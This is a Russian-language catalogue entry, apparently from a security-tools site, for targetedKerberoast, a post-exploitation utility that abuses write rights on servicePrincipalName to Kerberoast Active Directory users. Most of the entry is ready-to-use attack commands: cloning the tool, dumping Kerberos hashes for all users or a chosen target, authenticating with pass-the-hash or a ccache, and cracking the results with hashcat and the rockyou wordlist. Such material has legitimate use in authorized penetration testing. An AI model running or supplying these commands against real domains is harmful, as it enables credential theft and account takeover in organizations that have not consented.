targetedKerberoast

Post-Exploitation

Python-утилита для Kerberoast-атаки с дополнительным механизмом ACL abuse: для пользователей без SPN скрипт пытается временно выставить SPN (используя права на запись в атрибут `servicePrincipalName`), получает Kerberos hash, затем удаляет временный SPN. Поддерживает NTLM (cleartext, pass-the-hash), Kerberos (pass-the-key, overpass-the-hash, pass-the-cache). Работает против всех пользователей домена или по заданному списку. Хеши совместимы с hashcat (-m 13100) и John. Инструмент автора p0dalirius.

Добавлен 16.07.2026 · Обновлён 16.07.2026 · Post-Exploitation
Установка
git clone https://github.com/p0dalirius/targetedKerberoast
cd targetedKerberoast
pip install -r requirements.txt

# Атака по всем пользователям домена
python targetedKerberoast.py \
  -d domain.local \
  -u user \
  -p 'Password123!' \
  --dc-ip 192.168.1.101

# Только конкретный пользователь
python targetedKerberoast.py -d domain.local -u user -p Pass \
  --request-user target_user --dc-ip 192.168.1.101

# Pass-the-hash
python targetedKerberoast.py -d domain.local -u user \
  -H 'LMHASH:NTHASH' --dc-ip 192.168.1.101

# Kerberos auth (ccache)
export KRB5CCNAME=/tmp/user.ccache
python targetedKerberoast.py -d domain.local -k --no-pass --dc-ip 192.168.1.101

# Сохранить хеши и взломать
python targetedKerberoast.py -d domain.local -u user -p Pass -o hashes.txt
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
Комментарии
Войдите, чтобы оставить комментарий